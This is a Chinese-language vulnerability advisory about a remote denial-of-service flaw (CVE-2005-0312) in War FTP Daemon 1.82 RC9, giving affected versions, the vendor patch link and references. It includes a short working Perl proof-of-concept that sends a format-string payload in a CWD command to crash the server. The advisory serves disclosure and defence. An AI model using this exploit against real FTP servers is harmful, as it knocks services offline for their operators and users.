当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

War FTP Daemon远程拒绝服务漏洞

信息来源:MC.Iglo (mc.iglo@gmx.de)      发表日期:2013-11-15 11:42:00

War FTP Daemon是Jgaa的FTP程序。

War FTP Daemon 1.82.00-RC9作为NT服务运行时,远程经过身份验证的用户通过带特制路径名的CWD命令,利用此漏洞可造成拒绝服务。

 

BUGTRAQ-ID:12384

CVE-ID:2005-0312

 

受影响系统:

Jgaa War FTP Daemon 1.82 RC9

Jgaa War FTP Daemon 1.8

未受影响系统:

Jgaa War FTP Daemon 1.82 RC10

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl -w

# remote DoS PoC Exploit for WarFTPD 1.82 RC9

# THX 2 barabas 4 his GoldenFTP-sploit :)

# greetings fly out to Foobar

use strict;

use Net::FTP;

my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);

$ftp->login("anonymous","123@123.com");

$ftp->quot("CWD",$payload);

解决办法:

厂商补丁:

Jgaa

----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://support.jgaa.com/index.php?cmd=ShowProduct&ID=3

参考信息:

http://xforce.iss.net/xforce/xfdb/19129